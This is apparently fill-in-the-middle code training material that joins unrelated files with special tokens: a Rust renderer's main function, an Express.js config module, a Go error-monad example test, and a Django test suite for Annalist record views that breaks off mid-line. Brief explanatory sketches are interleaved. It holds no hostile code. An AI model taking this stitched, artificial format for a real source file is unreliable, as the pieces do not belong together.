    let html = read_source(matches.opt_str("h"), "examples/test.html");
    let css = read_source(matches.opt_str("c"), "examples/test.css");

    // Since we don't have an actual window, hard-code the "viewport" size.
    let initial_containing_block = layout::Dimensions {
        content: layout::Rect { x: 0.0, y: 0.0, width: 800.0, height: 600.0 },
        padding: Default::default(),
        border: Default::default(),
        margin: Default::default(),
    };

    // Parsing and rendering:
    let root_node = html::parse(html);
    let stylesheet = css::parse(css);
    let style_root = style::style_tree(&root_node, &stylesheet);
    let layout_root = layout::layout_tree(&style_root, initial_containing_block);
    let canvas = painting::paint(&layout_root, initial_containing_block.content);

    // Create the output file:
    let filename = matches.opt_str("o").unwrap_or("output.png".to_string());
    let file = File::create(&Path::new(&*filename)).unwrap();

<|fim▁hole|>
    let (w, h) = (canvas.width as u32, canvas.height as u32);
    let buffer: Vec<image::Rgba<u8>> = unsafe { std::mem::transmute(canvas.pixels) };
    let img = image::ImageBuffer::from_fn(w, h, Box::new(|&: x: u32, y: u32| buffer[(y * w + x) as usize]));
    let result = image::ImageRgba8(img).save(file, image::PNG);
    match result {
        Ok(_) => println!("Saved output as {}", filename),
        Err(_) => println!("Error saving output as {}", filename)
    }

    // Debug output:
    // println!("{}", layout_root.dimensions);
    // println!("{}", display_list);
}<|fim▁end|>
// Save an image:
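The hole above is filled by a section comment; the surrounding code then flattens the canvas into a vector and reads pixel (x, y) at index y * w + x. That row-major mapping, sketched standalone in Python with made-up dimensions:

# Row-major pixel indexing as used by buffer[(y * w + x)] above.
w, h = 4, 3
buffer = list(range(w * h))   # stand-in for the canvas pixels

def pixel(x, y):
    return buffer[y * w + x]

assert pixel(0, 0) == 0
assert pixel(3, 0) == 3       # end of first row
assert pixel(0, 1) == 4       # start of second row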
<|file_name|>express-cfg.js<|end_file_name|><|fim▁begin|>// =============================================================================
// Module to configure an ExpressJS web server
<|fim▁hole|>
// Requires
// {
//   "express": "4.13.3",
//   "cookie-parser": "1.4.0",
//   "morgan": "1.6.1",
//   "body-parser" : "1.14.1",
//   "express-session" : "1.12.1",
//   "method-override" : "2.3.5"
// }

var express = require('express');
var cookieParser = require('cookie-parser');
var methodOverride = require('method-override');
var http = require('http');
var bodyParser = require('body-parser');
var morgan = require('morgan');

var app = express();

app.use(morgan('dev')); // log every request to the console
app.use(cookieParser()); // read cookies (needed for auth)
app.use(bodyParser.json());
app.use(bodyParser.urlencoded({ extended: true }));

module.exports = {
    app : app
}<|fim▁end|>
// =============================================================================
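The Express module above registers its middleware in order — logger, cookie parser, body parsers — before exporting the app, and each request flows through the chain in registration order. A hedged Python sketch of that chaining idea; all handler names below are invented:

# Tiny stand-in for app.use(...): requests pass through middleware in
# registration order, each returning a (possibly annotated) request.
def logger(req):                  # like morgan: log every request
    print("->", req["path"])
    return req

def cookie_parser(req):           # like cookie-parser: attach parsed cookies
    return {**req, "cookies": {}}

def body_parser(req):             # like body-parser: attach parsed body
    return {**req, "body": {}}

middleware_chain = [logger, cookie_parser, body_parser]

def handle(req):
    for mw in middleware_chain:   # registration order matters
        req = mw(req)
    return req

print(handle({"path": "/health"}))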
<|file_name|>bind_test.go<|end_file_name|><|fim▁begin|>// Copyright (c) 2015, Jean Niklas L'orange // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions are met: // // 1. Redistributions of source code must retain the above copyright notice, // this list of conditions and the following disclaimer. // // 2. Redistributions in binary form must reproduce the above copyright notice, // this list of conditions and the following disclaimer in the documentation // and/or other materials provided with the distribution. // // 3. Neither the name of the copyright holder nor the names of its contributors // may be used to endorse or promote products derived from this software without // specific prior written permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE // ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE // LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF // SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS // INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN // CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE // POSSIBILITY OF SUCH DAMAGE. package errmonad_test import ( "encoding/json" "fmt" monad "gopkg.in/hyPiRion/go-errmonad.v1" ) const MaxBananaCount = 90 // Max amount of bananas in a box type BananaBox struct { Type string Bananas int } // Double takes a banana crate and returns a new banana crate where the amount // of bananas in it is doubled. If the new banana count will be larger than the // maximum banana count, this method will error. func (bc BananaBox) Double() (BananaBox, error) { return bc.AddBananas(bc.Bananas) } <|fim▁hole|>// AddBananas add n bananas to a banana box. If the new banana count will be // larger than the maximum banana count a single crate can contain, this method // will error. 
func (bc BananaBox) AddBananas(n int) (BananaBox, error) { if n+bc.Bananas > MaxBananaCount { return BananaBox{}, fmt.Errorf("Tried to add %d bananas to a box with %d bananas already inside it, will go over the limit", n, bc.Bananas) } bc.Bananas += n return bc, nil } func jsonBananaBox(bs []byte) (bb BananaBox, err error) { err = json.Unmarshal(bs, &bb) return } var doubleBananaBox = monad.Bind( jsonBananaBox, (BananaBox).Double, json.Marshal, ).(func([]byte) ([]byte, error)) var quadrupleBananaBox = monad.Bind( jsonBananaBox, (BananaBox).Double, (BananaBox).Double, json.Marshal, ).(func([]byte) ([]byte, error)) func Example() { examples := []string{ `[]`, `{"Bananas": "0"}`, `{"Type": "Dwarf Cavendish", "Bananas": 41}`, `{"Type": "Grand Nain", "Bananas": 16}`, } conversions := []func([]byte) ([]byte, error){ doubleBananaBox, quadrupleBananaBox, } for _, example := range examples { for _, convert := range conversions { bs, err := convert([]byte(example)) if err != nil { fmt.Println(err) } else { fmt.Println(string(bs)) } } } // Output: // json: cannot unmarshal array into Go value of type errmonad_test.BananaBox // json: cannot unmarshal array into Go value of type errmonad_test.BananaBox // json: cannot unmarshal string into Go value of type int // json: cannot unmarshal string into Go value of type int // {"Type":"Dwarf Cavendish","Bananas":82} // Tried to add 82 bananas to a box with 82 bananas already inside it, will go over the limit // {"Type":"Grand Nain","Bananas":32} // {"Type":"Grand Nain","Bananas":64} }<|fim▁end|>
<|file_name|>test_recordview.py<|end_file_name|><|fim▁begin|>from __future__ import unicode_literals from __future__ import absolute_import, division, print_function """ Tests for RecordView module and view Note: this module tests for rendering specifically for RecordView values, using view description sitedata files, and as such duplicates some tests covered by module test_entitygenericedit. """ __author__ = "Graham Klyne ([email protected])" __copyright__ = "Copyright 2014, G. Klyne" __license__ = "MIT (http://opensource.org/licenses/MIT)" import os import json import unittest import logging log = logging.getLogger(__name__) from django.conf import settings from django.db import models from django.http import QueryDict from django.contrib.auth.models import User from django.test import TestCase # cf. https://docs.djangoproject.com/en/dev/topics/testing/tools/#assertions from django.test.client import Client from annalist.identifiers import RDF, RDFS, ANNAL from annalist import layout from annalist import message from annalist.models.site import Site from annalist.models.sitedata import SiteData from annalist.models.collection import Collection from annalist.models.recordview import RecordView from annalist.models.recordfield import RecordField from annalist.views.uri_builder import uri_with_params from annalist.views.recordviewdelete import RecordViewDeleteConfirmedView from annalist.views.form_utils.fieldchoice import FieldChoice from .AnnalistTestCase import AnnalistTestCase from .tests import ( TestHost, TestHostUri, TestBasePath, TestBaseUri, TestBaseDir ) from .init_tests import ( init_annalist_test_site, init_annalist_test_coll, install_annalist_named_coll, create_test_coll_inheriting, init_annalist_named_test_coll, resetSitedata ) from .entity_testutils import ( make_message, make_quoted_message, site_dir, collection_dir, site_view_url, collection_edit_url, collection_entity_view_url, collection_create_values, render_select_options, create_test_user, context_field_map, context_view_field, context_bind_fields, check_context_field, check_context_field_value, ) from .entity_testviewdata import ( recordview_dir, recordview_coll_url, recordview_url, recordview_edit_url, recordview_value_keys, recordview_load_keys, recordview_create_values, recordview_values, recordview_read_values, view_view_context_data, default_view_fields_list, view_view_fields_list, view_view_form_data, recordview_delete_confirm_form_data ) from .entity_testentitydata import ( entity_url, entitydata_edit_url, entitydata_list_type_url, default_fields, default_label, default_comment, error_label, layout_classes ) from .entity_testsitedata import ( make_field_choices, no_selection, get_site_default_entity_fields_sorted, get_site_bibentry_fields_sorted ) # ----------------------------------------------------------------------------- # # RecordView tests # # ----------------------------------------------------------------------------- class RecordViewTest(AnnalistTestCase): def setUp(self): init_annalist_test_site() self.testsite = Site(TestBaseUri, TestBaseDir) self.sitedata = SiteData(self.testsite) self.testcoll = Collection(self.testsite, "testcoll") self.layout = ( { 'enum_field_placement_id': layout.ENUM_FIELD_PLACEMENT_ID , 'enum_list_type_id': layout.ENUM_LIST_TYPE_ID , 'enum_render_type_id': layout.ENUM_RENDER_TYPE_ID , 'enum_value_type_id': layout.ENUM_VALUE_TYPE_ID , 'enum_value_mode_id': layout.ENUM_VALUE_MODE_ID , 'field_typeid': layout.FIELD_TYPEID , 'group_typeid': layout.GROUP_TYPEID , 'list_typeid': 
layout.LIST_TYPEID , 'type_typeid': layout.TYPE_TYPEID , 'user_typeid': layout.USER_TYPEID , 'view_typeid': layout.VIEW_TYPEID , 'vocab_typeid': layout.VOCAB_TYPEID , 'field_dir': layout.FIELD_DIR , 'group_dir': layout.GROUP_DIR , 'list_dir': layout.LIST_DIR , 'type_dir': layout.TYPE_DIR , 'user_dir': layout.USER_DIR , 'view_dir': layout.VIEW_DIR , 'vocab_dir': layout.VOCAB_DIR }) return def tearDown(self): return @classmethod def setUpClass(cls): super(RecordViewTest, cls).setUpClass() return @classmethod def tearDownClass(cls): super(RecordViewTest, cls).tearDownClass() resetSitedata(scope="collections") return def test_RecordViewTest(self): self.assertEqual(Collection.__name__, "Collection", "Check Collection class name") return def test_recordview_init(self): t = RecordView(self.testcoll, "testview") u = recordview_coll_url(self.testsite, coll_id="testcoll", view_id="testview") self.assertEqual(t._entitytype, ANNAL.CURIE.View) self.assertEqual(t._entityfile, layout.VIEW_META_FILE) self.assertEqual(t._entityref, layout.COLL_BASE_VIEW_REF%{'id': "testview"}) self.assertEqual(t._entityid, "testview") self.assertEqual(t._entityurl, u) self.assertEqual(t._entitydir, recordview_dir(view_id="testview")) self.assertEqual(t._values, None) return def test_recordview1_data(self): t = RecordView(self.testcoll, "view1") self.assertEqual(t.get_id(), "view1") self.assertEqual(t.get_type_id(), layout.VIEW_TYPEID) self.assertIn( "/c/testcoll/d/%(view_dir)s/view1/"%self.layout, t.get_url() ) self.assertEqual( TestBaseUri + "/c/testcoll/d/%(view_typeid)s/view1/"%self.layout, t.get_view_url() ) t.set_values(recordview_create_values(view_id="view1")) td = t.get_values() self.assertEqual(set(td.keys()), set(recordview_value_keys())) v = recordview_values(view_id="view1") self.assertDictionaryMatch(td, v) return def test_recordview2_data(self): t = RecordView(self.testcoll, "view2") self.assertEqual(t.get_id(), "view2") self.assertEqual(t.get_type_id(), layout.VIEW_TYPEID) self.assertIn( "/c/testcoll/d/%(view_dir)s/view2/"%self.layout, t.get_url() ) self.assertEqual( TestBaseUri + "/c/testcoll/d/%(view_typeid)s/view2/"%self.layout, t.get_view_url() ) t.set_values(recordview_create_values(view_id="view2")) td = t.get_values() self.assertEqual(set(td.keys()), set(recordview_value_keys())) v = recordview_values(view_id="view2") self.assertDictionaryMatch(td, v) return def test_recordview_create_load(self): t = RecordView.create(self.testcoll, "view1", recordview_create_values(view_id="view1")) td = RecordView.load(self.testcoll, "view1").get_values() v = recordview_read_values(view_id="view1") self.assertKeysMatch(td, v) self.assertDictionaryMatch(td, v) return def test_recordview_default_data(self): t = RecordView.load(self.testcoll, "Default_view", altscope="all") self.assertEqual(t.get_id(), "Default_view") self.assertIn( "/c/_annalist_site/d/%(view_dir)s/Default_view"%self.layout, t.get_url() ) self.assertIn( "/c/testcoll/d/%(view_typeid)s/Default_view"%self.layout, t.get_view_url() ) self.assertEqual(t.get_type_id(), layout.VIEW_TYPEID) td = t.get_values() self.assertEqual( set(td.keys()), set(recordview_load_keys(view_uri=True, view_entity_type=True)) ) v = recordview_read_values(view_id="Default_view") v.update( { 'rdfs:label': 'Default record view' , 'annal:uri': 'annal:display/Default_view' }) v.pop('rdfs:comment', None) v.pop('annal:view_entity_type', None) self.assertDictionaryMatch(td, v) # actual, expect return # ----------------------------------------------------------------------------- # # 
RecordView edit view tests # # ----------------------------------------------------------------------------- class RecordViewEditViewTest(AnnalistTestCase): """ Tests for record view edit views """ def setUp(self): init_annalist_test_site() self.testsite = Site(TestBaseUri, TestBaseDir) self.testcoll = Collection.create(self.testsite, "testcoll", collection_create_values("testcoll")) self.no_options = [ FieldChoice('', label="(no options)") ] def special_field(fid): return ( fid == "Entity_see_also" or fid.startswith("Field_") or fid.startswith("List_") or fid.startswith("Type_") or fid.startswith("View_") or fid.startswith("User_") or fid.startswith("Coll_") or fid.startswith("Vocab_") or fid.startswith("Enum_") or fid.startswith("Group_") or False ) self.field_options = sorted( [ fid for fid in self.testcoll.child_entity_ids(RecordField, altscope="all") if fid != layout.INITIAL_VALUES_ID ]) self.field_options_no_bibentry = sorted( [ fid for fid in self.testcoll.child_entity_ids(RecordField, altscope="all") if fid != layout.INITIAL_VALUES_ID and not fid.startswith("Bib_") ]) self.field_options_bib_no_special = sorted( [ fid for fid in self.testcoll.child_entity_ids(RecordField, altscope="all") if fid != layout.INITIAL_VALUES_ID and not special_field(fid) ]) self.field_options_no_special = sorted( [ fid for fid in self.testcoll.child_entity_ids(RecordField, altscope="all") if fid != layout.INITIAL_VALUES_ID and not ((fid.startswith("Bib_") or special_field(fid))) ]) # log.info(self.field_options_no_bibentry) # For checking Location: header values... self.continuation_path = entitydata_list_type_url( coll_id="testcoll", type_id=layout.VIEW_TYPEID ) self.continuation_url = self.continuation_path create_test_user(self.testcoll, "testuser", "testpassword") self.client = Client(HTTP_HOST=TestHost) loggedin = self.client.login(username="testuser", password="testpassword") self.assertTrue(loggedin) return def tearDown(self): resetSitedata(scope="collections") return @classmethod def setUpClass(cls): super(RecordViewEditViewTest, cls).setUpClass() return @classmethod def tearDownClass(cls): super(RecordViewEditViewTest, cls).tearDownClass() resetSitedata() return # ----------------------------------------------------------------------------- # Helpers # ----------------------------------------------------------------------------- def _create_record_view( self, view_id, view_entity_type="annal:View", extra_field=None, extra_field_uri=None ): "Helper function creates record view entry with supplied view_id" t = RecordView.create( self.testcoll, view_id, recordview_create_values( view_id=view_id, view_entity_type=view_entity_type, extra_field=extra_field, extra_field_uri=extra_field_uri ) ) return t def _check_recordview_values( self, view_id, view_uri=None, view_entity_type="annal:View", update="RecordView", num_fields=4, field3_placement="small:0,12", extra_field=None, extra_field_uri=None, update_dict=None, ): "Helper function checks content of record view entry with supplied view_id" self.assertTrue(RecordView.exists(self.testcoll, view_id)) t = RecordView.load(self.testcoll, view_id) self.assertEqual(t.get_id(), view_id) self.assertEqual(t.get_view_url(), TestHostUri + recordview_url("testcoll", view_id)) v = recordview_values( view_id=view_id, view_uri=view_uri, update=update, view_entity_type=view_entity_type, num_fields=num_fields, field3_placement=field3_placement, extra_field=extra_field, extra_field_uri=extra_field_uri ) if update_dict: v.update(update_dict) for k in update_dict: if 
update_dict[k] is None: v.pop(k, None) # log.info("*** actual: %r"%(t.get_values(),)) # log.info("*** expect: %r"%(v,)) self.assertDictionaryMatch(t.get_values(), v) return t # Check context values common to all view fields #@@TODO: remove when references below replaced # see: _check_view_view_context_fields def _check_common_view_context_fields(self, response, action="", view_id="(?view_id)", orig_view_id=None, view_label="(?view_label)", view_entity_type="(?view_entity_type)", view_edit_view=True ): self.assertEqual(response.context['entity_id'], view_id) self.assertEqual(response.context['orig_id'], orig_view_id) self.assertEqual(response.context['type_id'], '_view') self.assertEqual(response.context['orig_type'], '_view') self.assertEqual(response.context['coll_id'], 'testcoll') self.assertEqual(response.context['action'], action) self.assertEqual(response.context['view_id'], 'View_view') # Fields # # NOTE: context['fields'][i]['field_id'] comes from FieldDescription instance via # bound_field, so type prefix is stripped. This does not apply to the field # ids actually coming from the view form. # self.assertEqual(len(response.context['fields']), 6) f0 = context_view_field(response.context, 0, 0) f1 = context_view_field(response.context, 1, 0) f2 = context_view_field(response.context, 2, 0) f3 = context_view_field(response.context, 3, 0) f4 = context_view_field(response.context, 4, 0) # 1st field - Id check_context_field(self, f0, field_id= "View_id", field_name= "entity_id", field_label= "View Id", field_placeholder= "(view id)", field_property_uri= "annal:id", field_render_type= "EntityId", field_value_mode= "Value_direct", field_value_type= "annal:EntityRef", field_placement= "small-12 medium-6 columns", field_value= view_id, options= self.no_options ) # 2nd field - Label check_context_field(self, f1, field_id= "View_label", field_name= "View_label", field_label= "Label", field_placeholder= "(view label)", field_property_uri= "rdfs:label", field_render_type= "Text", field_value_mode= "Value_direct", field_value_type= "annal:Text", field_placement= "small-12 columns", field_value= view_label, options= self.no_options ) # 3rd field - comment check_context_field(self, f2, field_id= "View_comment", field_name= "View_comment", field_label= "Help", field_property_uri= "rdfs:comment", field_render_type= "Markdown", field_value_mode= "Value_direct", field_value_type= "annal:Richtext", field_placement= "small-12 columns", options= self.no_options ) # 4th field - type of entity for view check_context_field(self, f3, field_id= "View_entity_type", field_name= "View_entity_type", field_property_uri= "annal:view_entity_type", field_render_type= "Identifier", field_value_mode= "Value_direct", field_value_type= "annal:Identifier", field_value= view_entity_type, options= self.no_options ) # 5th field - editable view option check_context_field(self, f4, field_id= "View_edit_view", field_name= "View_edit_view", field_property_uri= "annal:open_view", field_render_type= "CheckBox", field_value_mode= "Value_direct", field_value_type= "annal:Boolean", field_value= view_edit_view, options= self.no_options ) return # Check context values for view using default record view def _check_default_view_context_fields(self, response, action="", view_id="(?view_id)", orig_view_id=None, view_uri=None, view_label="(?view_label)", view_descr=None, view_entity_type="(?view_entity_type)", view_edit_view=True, view_fields=None, field_choices=None, add_field=None, remove_field=None, move_up=None, move_down=None, 
update="RecordView", continuation_url=None ): expect_context = view_view_context_data( coll_id="testcoll", view_id=view_id, orig_id=orig_view_id, action=action, view_uri=view_uri, view_label=view_label, view_descr=view_descr, view_entity_type=view_entity_type, view_edit_view=view_edit_view, view_fields=view_fields, field_choices=field_choices, add_field=add_field, remove_field=remove_field, move_up=move_up, move_down=move_down, update=update, continuation_url=continuation_url ) actual_context = context_bind_fields(response.context) self.assertEqual(len(response.context['fields']), 6) self.assertDictionaryMatch(actual_context, expect_context) return # The View_view test case checks descriptions of repeat-field-groups that are not # covererd by the Default_view case. def _check_view_view_context_fields(self, response, action="", num_fields=6): # Common fields self._check_common_view_context_fields(response, action=action, view_id="View_view", orig_view_id="View_view", view_label="View definition", view_entity_type="annal:View", view_edit_view=False ) # 6th field - field list f5 = context_view_field(response.context, 5, 0) expect_field_data = ( [ { 'annal:field_placement': 'small:0,12;medium:0,6' , 'annal:field_id': layout.FIELD_TYPEID+'/View_id' } , { 'annal:field_placement': 'small:0,12' , 'annal:field_id': layout.FIELD_TYPEID+'/View_label' } , { 'annal:field_placement': 'small:0,12' , 'annal:field_id': layout.FIELD_TYPEID+'/View_comment' } , { 'annal:field_placement': 'small:0,12' , 'annal:field_id': layout.FIELD_TYPEID+'/View_entity_type' } , { 'annal:field_placement': 'small:0,12;medium:0,6' , 'annal:field_id': layout.FIELD_TYPEID+'/View_edit_view' } , { 'annal:field_placement': 'small:0,12' , 'annal:field_id': layout.FIELD_TYPEID+'/View_fields' } ]) if num_fields == 7: # New blank field, if selected expect_field_data.append( { 'annal:property_uri': None , 'annal:field_placement': None , 'annal:field_id': None }) # log.info(repr(r.context['fields'][5]['field_value'])) check_context_field(self, f5, field_id= "View_fields", field_name= "View_fields", field_label= "Fields", field_property_uri= "annal:view_fields", field_render_type= "Group_Seq_Row", field_value_mode= "Value_direct", field_value_type= "annal:View_field", field_value= expect_field_data, options= self.no_options ) return # ----------------------------------------------------------------------------- # Form rendering tests # ----------------------------------------------------------------------------- def test_get_form_rendering(self): u = entitydata_edit_url("new", "testcoll", layout.VIEW_TYPEID, view_id="View_view") r = self.client.get(u+"?continuation_url=/xyzzy/") self.assertEqual(r.status_code, 200) self.assertEqual(r.reason_phrase, "OK") field_vals = default_fields( coll_id="testcoll", type_id=layout.VIEW_TYPEID, entity_id="00000001", tooltip1=context_view_field(r.context, 0, 0)['field_tooltip'], tooltip2=context_view_field(r.context, 1, 0)['field_tooltip'], tooltip3=context_view_field(r.context, 2, 0)['field_tooltip'], tooltip4=context_view_field(r.context, 3, 0)['field_tooltip'], tooltip5=context_view_field(r.context, 4, 0)['field_tooltip'], tooltip6f1=context_view_field(r.context, 5, 0). 
_field_description['group_field_descs'][0]['field_tooltip_test'] ) formrow1 = """ <div class="small-12 medium-6 columns" title="%(tooltip1)s"> <div class="row view-value-row"> <div class="%(label_classes)s"> <span>View Id</span> </div> <div class="%(input_classes)s"> <input type="text" size="64" name="entity_id" placeholder="(view id)" value="%(entity_id)s"/> </div> </div> </div> """%field_vals(width=6) formrow2 = """ <div class="small-12 columns" title="%(tooltip2)s"> <div class="row view-value-row"> <div class="%(label_classes)s"> <span>Label</span> </div> <div class="%(input_classes)s"> <input type="text" size="64" name="View_label" placeholder="(view label)" value="%(default_label_esc)s"/> </div> </div> </div> """%field_vals(width=12) formrow3 = """ <div class="small-12 columns" title="%(tooltip3)s"> <div class="row view-value-row"> <div class="%(label_classes)s"> <span>Help</span> </div> <div class="%(input_classes)s"> <textarea cols="64" rows="6" name="View_comment" class="small-rows-4 medium-rows-8" placeholder="(description of record view)"> %(default_comment_esc)s </textarea> </div> </div> </div> """%field_vals(width=12) formrow4 = """ <div class="small-12 columns" title="%(tooltip4)s"> <div class="row view-value-row"> <div class="%(label_classes)s"> <span>View entity type</span> </div> <div class="%(input_classes)s"> <input type="text" size="64" name="View_entity_type" placeholder="(Entity type URI/CURIE displayed by view)" value=""/> </div> </div> </div> """%field_vals(width=12) formrow5 = """ <div class="small-12 medium-6 columns" title="%(tooltip5)s"> <div class="row view-value-row"> <div class="%(label_classes)s"> <span>Editable view?</span> </div> <div class="%(input_classes)s"> <input type="checkbox" name="View_edit_view" value="Yes" checked="checked" /> <span class="value-placeholder">(edit view from edit entity form)</span> </div> </div> </div> """%field_vals(width=6) formrow6 = """ <div class="small-1 columns checkbox-in-edit-padding"> <input type="checkbox" class="select-box right" name="View_fields__select_fields" value="0" /> </div> """ formrow6f1 = (""" <div class="small-12 medium-4 columns" title="%(tooltip6f1)s"> <div class="row show-for-small-only"> <div class="view-label small-12 columns"> <span>Field ref</span> </div> </div> <div class="row view-value-col"> <div class="view-value small-12 columns"> """+ render_select_options( "View_fields__0__View_field_sel", "Field ref", no_selection("(field ref)") + get_site_default_entity_fields_sorted(), layout.FIELD_TYPEID+"/Entity_id", placeholder="(field reference)" )+ """ </div> </div> </div> """)%field_vals(width=4) # log.info("*** View content: "+r.content) self.assertContains(r, formrow1, html=True) self.assertContains(r, formrow2, html=True) self.assertContains(r, formrow3, html=True) self.assertContains(r, formrow4, html=True) self.assertContains(r, formrow5, html=True) self.assertContains(r, formrow6, html=True) self.assertContains(r, formrow6f1, html=True) return def test_get_new(self): u = entitydata_edit_url("new", "testcoll", layout.VIEW_TYPEID, view_id="View_view") r = self.client.get(u+"?continuation_url=/xyzzy/") self.assertEqual(r.status_code, 200) self.assertEqual(r.reason_phrase, "OK") # Test context # view_url = collection_entity_view_url( # coll_id="testcoll", type_id=layout.VIEW_TYPEID, entity_id="00000001" # ) self.assertEqual(r.context['coll_id'], "testcoll") self.assertEqual(r.context['type_id'], layout.VIEW_TYPEID) self.assertEqual(r.context['entity_id'], "00000001") 
self.assertEqual(r.context['orig_id'], None) self.assertEqual(r.context['entity_uri'], None) self.assertEqual(r.context['action'], "new") self.assertEqual(r.context['edit_view_button'], False) self.assertEqual(r.context['continuation_url'], "/xyzzy/") # Fields initially created self._check_default_view_context_fields(r, action="new", view_id="00000001", orig_view_id=None, view_label="", # default_label("testcoll", layout.VIEW_TYPEID, "00000001"), view_entity_type="", # view_url=recordview_url("testcoll", "00000001"), field_choices=self.field_options_no_special, continuation_url="/xyzzy/" ) return def test_get_copy(self): u = entitydata_edit_url( "copy", "testcoll", layout.VIEW_TYPEID, entity_id="Default_view", view_id="View_view" ) r = self.client.get(u) self.assertEqual(r.status_code, 200) self.assertEqual(r.reason_phrase, "OK") # Test context (values read from test data fixture) # view_url = collection_entity_view_url( # coll_id="testcoll", type_id=layout.VIEW_TYPEID, entity_id="Default_view" # ) self.assertEqual(r.context['coll_id'], "testcoll") self.assertEqual(r.context['type_id'], layout.VIEW_TYPEID) self.assertEqual(r.context['entity_id'], "Default_view_01") self.assertEqual(r.context['orig_id'], "Default_view") self.assertEqual(r.context['entity_uri'], None) self.assertEqual(r.context['action'], "copy") self.assertEqual(r.context['edit_view_button'], False) self.assertEqual(r.context['continuation_url'], "") # Fields self._check_default_view_context_fields(r, action="copy", view_id="Default_view_01", orig_view_id="Default_view", view_label="Default record view", # view_url=view_url, view_uri=None, view_entity_type="", field_choices=self.field_options_no_special, continuation_url="" ) return def test_get_copy_not_exists(self): u = entitydata_edit_url( "copy", "testcoll", layout.VIEW_TYPEID, entity_id="noview", view_id="View_view" ) r = self.client.get(u) # log.info(r.content) self.check_entity_not_found_response(r, err_msg=make_message( message.ENTITY_DOES_NOT_EXIST, type_id=layout.VIEW_TYPEID, id="noview", label=error_label("testcoll", layout.VIEW_TYPEID, "noview") ) ) return def test_get_edit(self): u = entitydata_edit_url( "edit", "testcoll", layout.VIEW_TYPEID, entity_id="Default_view", view_id="View_view" ) r = self.client.get(u) self.assertEqual(r.status_code, 200) self.assertEqual(r.reason_phrase, "OK") # Test context (values read from test data fixture) # view_url = collection_entity_view_url( # coll_id="testcoll", type_id=layout.VIEW_TYPEID, entity_id="Default_view" # ) self.assertEqual(r.context['coll_id'], "testcoll") self.assertEqual(r.context['type_id'], layout.VIEW_TYPEID) self.assertEqual(r.context['entity_id'], "Default_view") self.assertEqual(r.context['orig_id'], "Default_view") self.assertEqual(r.context['entity_uri'], "annal:display/Default_view") self.assertEqual(r.context['action'], "edit") self.assertEqual(r.context['edit_view_button'], False) self.assertEqual(r.context['continuation_url'], "") # Fields self._check_default_view_context_fields(r, action="edit", view_id="Default_view", orig_view_id="Default_view", view_label="Default record view", # view_url=view_url, view_uri="annal:display/Default_view", view_entity_type="", field_choices=self.field_options_no_special, continuation_url="" ) return def test_get_edit_not_exists(self): u = entitydata_edit_url( "edit", "testcoll", layout.VIEW_TYPEID, entity_id="noview", view_id="View_view" ) r = self.client.get(u) # log.info(r.content) self.check_entity_not_found_response(r, err_msg=make_message( 
message.ENTITY_DOES_NOT_EXIST, type_id=layout.VIEW_TYPEID, id="noview", label=error_label("testcoll", layout.VIEW_TYPEID, "noview") ) ) return # Test rendering of view with repeated field structure - in this case, View_view def test_get_recordview_edit(self): u = entitydata_edit_url( "edit", "testcoll", layout.VIEW_TYPEID, entity_id="View_view", view_id="View_view" ) r = self.client.get(u) self.assertEqual(r.status_code, 200) self.assertEqual(r.reason_phrase, "OK") # Test context (values read from test data fixture) # view_url = collection_entity_view_url( # coll_id="testcoll", type_id=layout.VIEW_TYPEID, entity_id="View_view" # ) self.assertEqual(r.context['coll_id'], "testcoll") self.assertEqual(r.context['type_id'], layout.VIEW_TYPEID) self.assertEqual(r.context['entity_id'], "View_view") self.assertEqual(r.context['orig_id'], "View_view") self.assertEqual(r.context['entity_uri'], "annal:display/View_view") self.assertEqual(r.context['action'], "edit") self.assertEqual(r.context['continuation_url'], "") # Fields self._check_view_view_context_fields(r, action="edit") return def test_get_recordview_edit_add_field(self): u = entitydata_edit_url( "edit", "testcoll", layout.VIEW_TYPEID, entity_id="View_view", view_id="View_view" ) u = uri_with_params(u, {'add_field': 'View_fields'}) r = self.client.get(u) self.assertEqual(r.status_code, 200) self.assertEqual(r.reason_phrase, "OK") # Test context (values read from test data fixture) # view_url = collection_entity_view_url( # coll_id="testcoll", type_id=layout.VIEW_TYPEID, entity_id="View_view" # ) self.assertEqual(r.context['coll_id'], "testcoll") self.assertEqual(r.context['type_id'], layout.VIEW_TYPEID) self.assertEqual(r.context['entity_id'], "View_view") self.assertEqual(r.context['orig_id'], "View_view") self.assertEqual(r.context['entity_uri'], "annal:display/View_view") self.assertEqual(r.context['action'], "edit") self.assertEqual(r.context['continuation_url'], "") # View context self._check_view_view_context_fields(r, action="edit", num_fields=7) return # ----------------------------------------------------------------------------- # Form response tests # ----------------------------------------------------------------------------- # -------- new view -------- def test_post_new_view(self): self.assertFalse(RecordView.exists(self.testcoll, "newview")) f = view_view_form_data(view_id="newview", action="new", update="NewView") u = entitydata_edit_url("new", "testcoll", layout.VIEW_TYPEID, view_id="View_view") r = self.client.post(u, f) # print r.content self.assertEqual(r.status_code, 302) self.assertEqual(r.reason_phrase, "Found") self.assertEqual(r.content, b"") self.assertEqual(r['location'], self.continuation_url) # Check that new record type exists self._check_recordview_values("newview", update="NewView", num_fields=0) return def test_post_new_view_cancel(self): self.assertFalse(RecordView.exists(self.testcoll, "newview")) f = view_view_form_data( view_id="newview", action="new", cancel="Cancel", update="Updated RecordView" ) u = entitydata_edit_url("new", "testcoll", layout.VIEW_TYPEID, view_id="View_view") r = self.client.post(u, f) self.assertEqual(r.status_code, 302) self.assertEqual(r.reason_phrase, "Found") self.assertEqual(r.content, b"") self.assertEqual(r['location'], self.continuation_url) # Check that new record type still does not exist self.assertFalse(RecordView.exists(self.testcoll, "newview")) return def 